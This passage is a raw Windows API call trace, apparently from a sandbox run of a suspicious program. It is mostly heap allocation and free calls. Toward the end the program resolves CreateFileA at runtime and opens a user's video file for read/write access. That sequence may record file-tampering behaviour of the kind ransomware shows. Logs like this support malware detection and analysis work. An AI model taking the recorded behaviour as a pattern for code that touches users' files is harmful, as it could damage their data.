hHeap=0x8a0000) returned 1 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0198.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0198.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0198.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.058] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.061] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd438 [0198.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd438, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0198.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.061] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0198.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0198.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd438, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0198.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.061] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0198.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0198.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0198.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa548 [0198.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", cchWideChar=67, lpMultiByteStr=0x9aa548, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", lpUsedDefaultChar=0x0) returned 67 [0198.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0198.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.063] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\nseh3.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x86) returned 0x907778 [0198.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x907778, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf") returned 67 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 